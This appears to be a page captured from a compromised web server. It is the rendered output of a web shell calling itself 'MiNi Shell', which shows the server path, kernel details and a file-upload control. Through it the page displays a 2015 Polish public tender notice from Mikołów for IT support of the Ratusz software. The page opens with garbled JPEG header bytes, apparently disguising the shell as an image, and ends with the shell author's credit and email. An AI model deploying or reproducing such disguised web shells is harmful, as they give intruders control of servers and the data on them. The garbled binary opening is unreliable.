JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151117/167595-N-2015.html

<p class="kh_header"><b>Mikołów: Asysta techniczna w zakresie obsługi technicznej systemu informatycznego zainstalowanego w Urzędzie Miasta Mikołów w zakresie pakietu Ratusz obejmujący aplikacje Finansowo Księgowe, Podatkowe, Kadry Płace, Środki Trwałe, Odpady Komunalne</b><br>
<b>Numer ogłoszenia: 167595 - 2015; data zamieszczenia: 17.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mikołów , Rynek 16, 43-190 Mikołów, woj. śląskie, tel. 32 3248500, faks 32 3248400.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Asysta techniczna w zakresie obsługi technicznej systemu informatycznego zainstalowanego w Urzędzie Miasta Mikołów w zakresie pakietu Ratusz obejmujący aplikacje Finansowo Księgowe, Podatkowe, Kadry Płace, Środki Trwałe, Odpady Komunalne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny</b></p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Asysta techniczna w zakresie obsługi technicznej systemu informatycznego zainstalowanego w Urzędzie Miasta Mikołów w zakresie pakietu Ratusz obejmujący aplikacje finansowo Księgowe, Podatkowe, Kadry Płace, Środki Trwałe, Odpady Komunalne.

Wykonawca w ramach zawartej umowy będzie świadczył asystę techniczną od 01.01.2016r. do 31.12.2017r. zainstalowanego systemu informatycznego w Urzędzie Miasta Mikołów obsługującym moduły:

POJAZD - podatek od środków transportowych - wersja Windows  
KASA - system rejestracji wpłat i wypłat gotówkowych - wersja Windows  
FINANSE - system finansowo - księgowy - wersja Windows 
BUDŻET + RB - projekt wraz z analizą wykonania budżetu - wersja Windows  
EPROJEKT - projekt budżetu
PRZELEW ELEKTRONICZNY - emisja przelewów - wersja Windows 
KADRY - system ewidencji pracowników - wersja Windows  
PŁACE - system płacowy - wersja Windows  
REX - podatek od posiadania psów
EAKCYZA - zwrot podatku akcyzowego
KONCESJE ALKOHOLOWE - system ewidencji udzielania zezwoleń na sprzedaż alkoholu
PKZP - moduł księgowości kasy zapomogowo-pożyczkowej i funduszu mieszkaniowego 
FAKTURA - system fakturowania - wersja Windows -  
POSESJA - podatek od nieruchomości rolny i leśny osób fizycznych - wymiar - wersja Windows  
POSESJA - podatek od nieruchomości rolny i leśny osób fizycznych - księgowość - wersja Windows  
FIRMY_PD - podatek od nieruchomości, rolny i leśny osób prawnych - wymiar - wersja Windows  
FIRMY_PD - podatek od nieruchomości, rolny i leśny osób prawnych - księgowość - wersja Windows 
KASA PODATKOWA współpracująca z systemami dochodowymi - wersja Windows 
DYSPONENT BUDŻETOWY - rejestr zamówień, umów, dokumentów rozliczeniowych - wersja Windows 
DYSPOZYTOR KASOWY - moduł umożliwiający generowanie dyspozycji wprost do kasy.
DZIERŻAWY - ewidencja umów z tytułu dzierżaw - wersja Windows 
WIECZYSTE UŻYTKOWANIE - ewidencja umów z tytułu wieczystego użytkowania - wersja Windows 
REJESTR OPŁAT - księgowość analityczna dochodów niepodatkowych - wersja Windows 
R_PESEL (EWID-POD) - moduł komunikacji pomiędzy systemami podatkowymi a Ewidencją Ludności - wersja Windows  
R_SWDE (SŁOWNIKI) - moduł współpracy programów dochodowych z ewidencją gruntów - wersja Windows  
ODPADY KOMUNALNE -  wymiar i księgowość opłaty za zagospodarowanie odpadów komunalnych
WYCIĄG BANKOWY - moduł płatności masowych - wersja Windows 
GUS - moduł eksportu danych z bazy dochodowej dla GUS-u na potrzeby Narodowego Spisu Powszechnego 
ŚRODKI TRWAŁE - system gospodarki środkami trwałymi  
WYPOSAŻENIE - system ewidencji pozostałych środków trwałych 
R_CEPIK - moduł do wymiany danych z bazą Centralnej Ewidencji Pojazdów i Kierowców - 1 licencja
ADMIN - administrator systemu do obsługi powyższych licencji
WYCIĄG BANKOWY - moduł obsługi bankowych wyciągów elektronicznych do systemu FK - wersja Windows  
EURZAD - moduł dla firmy wywozowej celem importu danych.
NOTA - moduł wymiany danych pomiędzy aplikacjami w ramach jednej bazy
XML- transfer plików wymiany danych pomiędzy bazami danych w formacie xml
DB BACKUP IB - moduł odpowiedzialny za wykonywanie kopii bezpieczeństwa
Obsługa techniczna polegać będzie na:

1. Informowaniu o zmianach w programach objętych umową, dostarczanie aktualnych wersji programów zwiększających ich funkcjonalność oraz dostosowanych do aktualnie obowiązującego stanu prawnego regulacji ustawowych obowiązujących w Rzeczypospolitej Polskiej, wykorzystywanych lub mających zastosowanie w oprogramowaniu, udzielenie dostępu do elektronicznej wersji dokumentacji systemu RATUSZR w zakresie oprogramowania wymienionego powyżej 

2.  Serwisie oprogramowania: udzielanie konsultacji telefonicznych w dni robocze w godzinach 8.00 - 16.00, udzielanie konsultacji za pomocą systemu zdalnej pomocy NTRSupport w zakresie usterek i awarii, usuwanie usterek/błędów i awarii krytycznych systemów objętych umową i wynikających z winy Wykonawcy, gdzie czas reakcji:
na zgłoszoną awarię krytyczną - do 8 godzin roboczych, 
czas usunięcia awarii krytycznej lub zapewnienie alternatywnego sposobu pracy na systemie - do 16 godzin roboczych, 
czas reakcji na zgłoszoną usterkę/błąd - do 24 godzin roboczych,
czas usunięcia usterki/błędu - do 10 dni roboczych
 przy czym awaria krytyczna rozumiana jest jako niepoprawne działanie oprogramowania, które jest niemożliwe do samodzielnego usunięcia przez Zamawiającego, a uniemożliwia eksploatację systemu, natomiast usterka/błąd to nieprawidłowe lub niezgodne z dokumentacją wykonywanie funkcji systemu, które jednak nie powoduje konieczności wstrzymania eksploatacji systemu. 
Podane terminy  mogą ulec zmianie, każdorazowo w wyniku ustaleń pomiędzy stronami, jak i w przypadku kiedy usuwanie powyższych problemów jest niemożliwe z powodów na które Wykonawca nie miał bezpośredniego wpływu. Za godziny robocze uznaje się czas od poniedziałku do piątku w godzinach pomiędzy 8.00 a 16.00 z wyłączeniem dni ustawowo wolnych od pracy,

3. Zorganizowaniu raz w roku spotkania w siedzibie Zamawiającego, w trakcie którego Zamawiający przedstawi wszelkie uwagi i wnioski dotyczące użytkowanych systemów oraz zostanie poinformowany o aktualnym stanie prac nad rozwojem pakietu RATUSZ, 

4. Udzielania konsultacji telefonicznych w dni robocze w godz.8.00-16.00, informowania o zmianach w oprogramowaniu serwera bazodanowego Firebird, zdalnego podniesienia wersji systemu bazodanowego Firebird na życzenie klienta, 

4a) W przypadku zlecenia od Zamawiającego zdalnego przygotowania nowego serwera bazodanowego do pracy z systemem Ratusz.

5. Wykonywaniu dodatkowych prac zleconych przez Zamawiającego w zakresie:
a) usuwanie usterek i awarii systemów objętych umową, a nie wynikających z winy Wykonawcy
b) przeprowadzania dodatkowych prac szkoleniowo-wdrożeniowych w zakresie pełnego wykorzystania oprogramowania objętego umową.
c) Diagnostyki, reinstalacji i rekonfiguracji:
- oprogramowania serwera bazodanowego Firebird  
- oprogramowania serwera systemu operacyjnego Linux 
- w przypadku awarii lub zmian systemowych po uprzednim zgłoszeniu przez Zamawiającego.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium  w wysokości: 4 800,00 zł (słownie: cztery tysiące osiemset złotych) nie później niż do upływu terminu składania ofert, w formach o jakich mowa w art. 45 ust. 6 ustawy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Urzędu Miasta: 
Mikołowski Bank Spółdzielczy w Mikołowie
Nr 65 84360003 0000 0000 0071 0042 
Pozostałe formy wadium, o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy, należy złożyć w oryginale do depozytu w kasie Urzędu Miasta, pokój nr 1, w wysokości stanowiącej równowartość powyższej kwoty, nie później niż do upływu terminu składania ofert. 
Wadium w formie niepieniężnej musi zawierać bezwarunkowe zobowiązanie Gwaranta do zapłaty kwoty gwarancji na pierwsze pisemne żądanie zamawiającego, o ile zaistnieje  którakolwiek z okoliczności wskazanych w art. 46 ust. 4a lub ust. 5 ustawy. W przypadku załączenia oryginału wadium w postaci niepieniężnej do oferty zamawiający uzna, że termin wniesienia wadium został dotrzymany. Zamawiający nie jest zobowiązany do udowodnienia, że nieskuteczność wezwania, o którym mowa w art. 26 ust. 3 cyt. ustawy, wynikła z przyczyn leżących lub nie leżących po stronie wykonawcy.
Za skutecznie wniesione wadium w pieniądzu uważa się wadium znajdujące się /zaksięgowane/ do upływu terminu składania ofert na rachunku Zamawiającego. 
W przypadku uchybienia temu terminowi zamawiający uzna, że wadium nie zostało skutecznie wniesione. W treści przelewu bankowego lub gwarancji należy zamieścić informację o numerze postępowania i nazwie postępowania. O ile wnoszący wadium nie jest podmiotem, który składa ofertę należy w treści przelewu lub gwarancji wskazać na rzecz kogo wadium zostaje wniesione. W przypadku braku możliwości ustalenia, w czyim imieniu zostało wniesione wadium lub jakiego postępowania dotyczy, skutkować to będzie wykluczeniem wykonawcy z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie, a w przypadku świadczeń okresowych lub ciągłych wykonywanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie usługi asysty technicznej oprogramowania u 1 podmiotu, u którego zainstalowane jest oprogramowanie obejmujące minimum moduły: Finansowo Księgowe, Podatkowe, Kadry Płace, Środki Trwałe, Odpady Komunalne o wartości min. 100 000,00 zł brutto;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>wykonanie, a w przypadku świadczeń okresowych lub ciągłych wykonywanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie usługi asysty technicznej oprogramowania u 1 podmiotu, u którego zainstalowane jest oprogramowanie obejmujące minimum moduły: Finansowo Księgowe, Podatkowe, Kadry Płace, Środki Trwałe, Odpady Komunalne o wartości min. 100 000,00 zł brutto;;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Ilość dostępnych kanałów udzielania wsparcia - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Mikołowa Rynek 16, 43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2015 godzina 12:00, miejsce: Urząd Miasta Mikołowa Rynek 16, 43-190 Mikołów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Kryteriami oceny ofert  są:
1.1.	Cena - 70 pkt
1.2.	Ilość dostępnych kanałów udzielania wsparcia -  max. 30 pkt.  
Za kanały dostępu Zamawiający uznaje:
 - dedykowany nr telefoniczny  
- infolinia wsparcia technicznego 
- zdalne połączenie (zdalny pulpit) 
- serwer FTP do przesyłania szablonów
- inne równoważne  zapewniające bezpośredni kontakt Zamawiający - Wykonawca. 
Jeżeli Wykonawca zaoferuje jeden kanał udzielania wsparcia Wykonawca uzyska 0 pkt. Za każdy następny zaoferowany kanał udzielenia wsparcia Wykonawca uzyska 5 pkt, jednak nie więcej niż 30 pkt.
Jeżeli Wykonawca nie zaoferuje żadnego kanału udzielania wsparcia Zamawiający uzna, że treść oferty nie odpowiada treści specyfikacji istotnych warunków  zamówienia i odrzuci ofertę.

Punktacja wg wzoru:
  
 CN/CO   x  70 pkt    +    dodatkowa ilość pkt związana z kanałem komunikacyjnym 
 
 = ............... punktów  
*  wyjaśnienia:     CN  - oferta z najniższą ceną
                            CO  - cena oferty badanej

Oferta może uzyskać maksymalnie 100 pkt. ( 70 pkt za cenę i 30 pkt za posiadane kanały komunikacyjne)
Ilość punktów zostanie wyliczona i zaokrąglona do dwóch miejsc po przecinku.

2. Zamawiający wykluczy wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności gdy w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com